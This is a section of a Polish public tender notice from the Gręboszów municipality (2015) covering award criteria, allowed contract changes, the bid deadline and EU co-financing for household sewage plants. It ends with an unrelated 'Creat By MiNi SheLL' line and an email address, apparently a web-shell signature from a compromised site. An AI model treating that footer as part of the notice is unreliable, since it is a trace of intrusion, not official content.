<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Okres gwarancji i odpowiedzialności z tytułu rękojmi za jakość wykonania przedmiotu zamówienia - 10.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zmiana   treści   niniejszej   umowy   może nastąpić  wyłącznie w granicach unormowania art.144 ust.1 ustawy 
      Pzp na warunkach określonych w SIWZ za zgodą obu  stron wyrażoną na   piśmie.  
2.   Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru Wykonawcy, w przypadku:
      1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu 
    zamówienia lub świadczenia Stron;
      2) zmiany terminu realizacji umowy;
          a) w przypadku wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze 
        itp. warunki pogodowe), uniemożliwiające realizację robót. Wstrzymanie z tego powodu musi być potwierdzone
              w dzienniku budowy i zaakceptowane przez inspektora nadzoru,
          b) przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   niemożliwością 
                prowadzenia prac, np.: będące następstwem działania organów administracji,   wstrzymanie prac budowlanych  
               przez właściwy organ, opóźnienia związane z uzyskiwaniem przez  Wykonawcę lub Zamawiającego  
               niezbędnych w myśl ustawy Prawo budowlane dokumentów,
         c)   innymi okolicznościami nie powstałymi  z winy Wykonawcy lub koniecznością wykonania  dodatkowych 
               i niemożliwych do przewidzenia robót,
         W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania  umowy może 
         ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia przedmiotu zamówienia,  nie dłużej jednak 
         niż o okres trwania tych okoliczności.
 3)   Zmiana sposobu spełniania świadczenia;
 a)  Zamawiający  dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności 
      wykonania robót zamiennych w stosunku do przewidzianych dokumentacja projektową, w sytuacji gdy 
      wykonanie tych robót będzie niezbędne dla prawidłowego, tj. zgodnego z zasadami wiedzy technicznej
      i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
b)  Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie  
      przetargowej,  pod warunkiem, że zmiany te będą  korzystne  dla Zamawiającego. Będą to, przykładowo, 
      okoliczności:
      - powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatacje i konserwacje 
        wykonanego  przedmiotu umowy,
      - powodujące poprawienie parametrów technicznych,
      - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących 
         przepisów.
      Dodatkowo możliwa jest  zmiana producenta poszczególnych materiałów i urządzeń przedstawionych 
      w ofercie przetargowej, pod  warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych 
      materiałów lub urządzeń.
c)   Ustala się, że wszelkie roboty zamienne, dodatkowe,  będą wykonywane przy zachowaniu nie pogorszonych norm, 
       standardów   i parametrów,  a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia z tytułu 
       takich  zmian.
d)   Przewiduje się także możliwość ograniczenia zakresu rzeczowego przedmiotu umowy (roboty zaniechane),    
      w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy 
      technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy, lub 
      w przypadku rezygnacji osób zainteresowanych budową naturalnych przydomowych oczyszczalni ścieków.
      W takim  przypadku  wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym  
      Zamawiający   zapłaci za   wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen 
      z przetargu, po przedłożeniu zaakceptowanego kosztorysu  różnicowego.

4)   Zmiany osobowe;
a)   Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się 
      co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa  w ustawie Prawo 
      budowlane lub innych ustawach, 
b)  Zmiana podwykonawców, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz 
      spełnienie  przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
 c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.

5)   Pozostałe zmiany;
 a) Zmiana stawki podatku od towarów i usług VAT związana  ze zmianą obowiązujących przepisów  prawa.
     W takim przypadku Zamawiający dopuszcza  możliwość odpowiednio zwiększenia lub zmniejszenia  
     wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT płaconego przez wykonawcę. 
  b) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie       
      przysługujące wykonawcy zostanie odpowiednio pomniejszone. W takim przypadku Zamawiający zastrzega 
      sobie prawo zmiany umowy poprzez sprecyzowanie rzeczywistego końcowego wynagrodzenia.
  c) zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych  w umowie 
      w celu jej doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony,    
  d) zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnej,    
      ekonomicznej lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem 
      możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający  dopuszcza możliwość zmiany        
      umowy, w szczególności terminu realizacji zamówienia umowy. 

3.   Warunkiem wprowadzenia zmian do niniejszej umowy jest potwierdzenie powstania okoliczności w formie opisowej
      i właściwie zaakceptowanej przez obie strony umowy oraz sporządzenie pisemnego aneksu podpisanego przez strony 
      umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id,277574.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gręboszów, pokój nr 2 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 200 zł + VAT 23 %.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2015 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rolnego na rzecz 
    Rozwoju Obszarów Wiejskich w ramach Działania Podstawowe Usługi dla Gospodarki i Ludności Wiejskiej 
    objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com